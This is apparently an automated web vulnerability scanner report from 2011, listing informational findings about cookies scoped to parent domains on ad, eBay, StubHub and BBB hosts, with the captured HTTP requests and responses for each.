Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8J; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:11 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8J; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QjH71; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5? HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl

Response

13.101. http://rover.ebay.com/rover/1/711-53200-19255-0/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/rover/1/711-53200-19255-0/1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

npii=btpim/14e25d58a^tguid/adb7b0cb1300a0aa15432be3fe5c798450070202^cguid/3666b2e01300a47a44d622a6ffc1937250070202^trm/svid%3D9431685814850070202^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:35:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rover/1/711-53200-19255-0/1?type=2&campid=5336216552&customid=842112189&item=120749940240&ext=120749940240 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dp1=bu1p/QEBfX0BAX19AQA**4fe09dfb^; ns1=BAQAAATCQmOoWAAaAANgARk/gnftjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wPysh37l0/bD8OFYXWzauWH5+M/Q*; nonsession=CgADKACBXZWv7YWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTf9xgzLqukJm; npii=btrm/svid%3D943168581484fea87d0^tguid/adb7b0cb1300a0aa15432be3fe5c79844fea87d0^cguid/3666b2e01300a47a44d622a6ffc193724fea87d0^

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.ad2%60a1a-13143aeae95
Set-Cookie: npii=btpim/14e25d58a^tguid/adb7b0cb1300a0aa15432be3fe5c798450070202^cguid/3666b2e01300a47a44d622a6ffc1937250070202^trm/svid%3D9431685814850070202^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:35:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private
Pragma: no-cache
Location: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601616085&item=120749940240
Content-Length: 0
Date: Tue, 19 Jul 2011 18:35:46 GMT

13.102. http://rover.ebay.com/roverimp/0/0/14 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/roverimp/0/0/14

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702da^cguid/3666b2e01300a47a44d622a6ffc19372500702da^trm/svid%3D94316858148500702da^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roverimp/0/0/14?imp=2041647&lv=tz%3D-5%26lt%3D2011-07-19T18%253A39%253A19%253A494%26ref%3D%26ai%3D520%26res%3D1920x1200%26fla%3Dundefined%26slr%3D0%26scd%3D32%26ctb%3D26259&mpt=1311100759544 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ds2=asotr/b13qzzzzzLCz^; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702ba^cguid/3666b2e01300a47a44d622a6ffc19372500702ba^trm/svid%3D94316858148500702ba^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.ac3g%3C52-13143b1fa46
Set-Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702da^cguid/3666b2e01300a47a44d622a6ffc19372500702da^trm/svid%3D94316858148500702da^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:22 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: image/gif
Content-Length: 42
Date: Tue, 19 Jul 2011 18:39:22 GMT

GIF89a.............!.......,...........2.;

13.103. http://rover.ebay.com/roversync/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/roversync/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d8^cguid/3666b2e01300a47a44d622a6ffc19372500702d8^trm/svid%3D94316858148500702d8^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roversync/?site=0&stg=1&mpt=1311100723361 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ds2=asotr/b13qzzzzzLCz^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5E; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9un*ts67.adea746-13143b1f1e3
Set-Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d8^cguid/3666b2e01300a47a44d622a6ffc19372500702d8^trm/svid%3D94316858148500702d8^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:20 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: image/gif
Content-Length: 42
Date: Tue, 19 Jul 2011 18:39:20 GMT

GIF89a.............!.......,...........2.;

13.104. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lgtix=NQADAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB; path=/; expires=Fri, 18 Jul 2014 20:44:08 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=7973594 HTTP/1.1
Host: rt.legolas-media.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: ui=e01db2f2-208a-43e5-beec-a78df4693afe; lgtix=NQABAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB; lgpr=//8=

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:08 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQADAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB; path=/; expires=Fri, 18 Jul 2014 20:44:08 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 0
Connection: close

13.105. http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.stubhubstatic.com
Path:	/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTHID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com
TLTSID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js HTTP/1.1
Host: s.stubhubstatic.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:37 GMT
Server: Apache
Set-Cookie: TLTHID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com
Set-Cookie: TLTSID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com
Last-Modified: Wed, 29 Jun 2011 00:07:09 GMT
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Wed, 18 Jul 2012 18:35:37 GMT
Vary: Accept-Encoding
Content-Length: 73589
Content-Type: text/javascript

if(typeof TeaLeaf==="undefined"){TeaLeaf={};TeaLeaf.Private={};TeaLeaf.tlStartLoad=new Date();if(!TeaLeaf.Configuration){TeaLeaf.Configuration={tlversion:"2011.03.15.1",tlinit:false,tlSDK:false,tlSetG
...[SNIP]...

13.106. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seal-alaskaoregonwesternwashington.bbb.org
Path:	/logo/rbhzbus/realnetworks-43000165.png

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

logolink=43000165; path=/; domain=alaskaoregonwesternwashington.bbb.org
logolink=43000165; path=/; domain=bbb.org

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logo/rbhzbus/realnetworks-43000165.png HTTP/1.1
Host: seal-alaskaoregonwesternwashington.bbb.org
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:47 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR NOR ONL UNI COM NAV"
Set-Cookie: logolink=43000165; path=/; domain=alaskaoregonwesternwashington.bbb.org
Set-Cookie: logolink=43000165; path=/; domain=bbb.org
Content-Disposition: inline; filename="seal-for-43000165.png"
Expires: Wed, 20 Jul 2011 03:42:51 GMT
Last-Modified: Tue, 19 Jul 2011 15:42:51 GMT
Etag: 3603dc914d773028caa686e571a980bf
Content-Type: image/png
Content-Length: 8316

.PNG
.
...IHDR.......&........l.. .IDATx...y|T......Y3.C.I......&;........W......._.*..Zw.b-H]...Pd.A.a.....M........L.....b...^...{...'s..9.Y.. L......GH..$..i...8I.......~.
..V.`8.'...Z...]..1x..
...[SNIP]...

13.107. http://secure.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:36:05 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)lByB_/)J710+(4l>TXOa/.Birq1fq-X1ERjb@jz/SQr@WW]eUJ-OE*1#UHg*y%yOLtrDh-C4!Hli5a!`H2^lxIri!1F8u-S'01a-)<.7^F*rx5H4abfMh8ka_c$rXGuAnkCQhvg(eH>ow9.x?t0KJTEJbtcX^90n-JKj)^q-:`?.Q^cx-#SPiA)Xvm<4-KK3*yAdiR?e3@*x6kRX0IipL$d9hb'5B).jNM(-0gRpoyYWA:OpD@yyRKmgsn2IT*8)ndMM#)ulobbjOQ[2x/si'Oj2dh]?Rfs-b1cH+3z?T2j4wh!H'UucnRj1hcD_i0_vk7v`xHvikYsgmE/Fnn.rp+SOt#=IA`bM]+`?1TG^@6E.<eb8<327x<r9r$nc`9jV1oH!Ecm%'+9AA0fIOIil@mkb0ClZAW(Sb9Ap%Wd-/j6y[!k)AQq_):^`Ru22I]KSNT1C+yO(Zhq67RVPrPp108OQNoMbkQ5%%IO)H^Xo:ZWT=9DHt8?JX[MBc.='TK#t[zgSwT%0AAS9ksGdUbRBu[L2fVttAEImIc0kL6(5GCL.-^IVfqMi*(#U2Rj`.VK0DFzHnR-ao7Enah'MdsB.Cj!e$1sY_6/o7O(PN:cvbi9uYTTpwSQ#ecxe?Yn2rWdm*='f$1ZusKKmC4f5>^)ma(vor3?sbu[5VvqNbgC)$m$F1+x%%1$u-rqb]$/hZbv'fVWGPkWCSQ$U`:/q'F[-kQuU:ZcqgBD2XC8T8p=`2x9ftcpHl/@6Zg5Xbt-q^wwx1e`%M<aT; path=/; expires=Mon, 17-Oct-2011 18:36:05 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=TM-1&member=364 HTTP/1.1
Host: secure.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lByB_/)J710+(.p3Z5+h4$Vy!yQYtW=Z5Z#lksL^h_:u[IkzlP?'IePJ/Z#Fy#8/vNL^@iW')uNV=zGung>(`Nvl+CN8u-4+Q:+G!i8zGW$6P0Ygj@gDJ6!3?ZhDD5$=8BCeDZt%n`?LyXoJ#6)EuCK6aCI$H_MElJh'P$eeW!*0s)5De8DL?*#b$[EsY7U88->_iR@sU@-_C!RX0K>pRo:'hdT`N%S]+?#:oYotSYv4@Yo^B@ypqVmgsn2IQvk]ngqdF)yegzmDu+k*[z^t:y@KNF?jNEu`nMBkjUs9T2ndLh!>yTe'`=U1hcD5i0M#o^+INb#$Fo#H]Y+!sTkU/=CCna0DqAscOQEb18*N=6E.D9a:91#6DRsnGmNy*nBg3QRvH6PO^D63]1Av>W9w7$qzEylR?X'('H+w*hOjM1CKvMOdL.x6nkE)2MTY5>uVbIIRX*WFGCg]V>7+6OIy0p@me-wEAV*5(6<x%kah-9v8G31F+D1hgwE.>bj3k$+_hrDkc0#`8fWEmU*b5Al<nY!0k14WeBG[Rc%(D3io)qo*(Vm%(Wt$).pcz]RVf*JJ.pv>fpY3BKSs8.f/qLc%eUa?ZD^I1VIp[X@kcfSC75Y_=l$)qPK]!zpr2SCQ-q]``OVL*/=(GCO7b!0sGu0sx<Y+$^WE/FM2.1ZPl%av@7<^=/5jy:KaE%l(nW>n3iDaFbwW!JTqWV-st*l7vo:UeNqhsP.`j$]GjFrRJtqDW3cBrZ9sY+WHuay<OsLep3

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
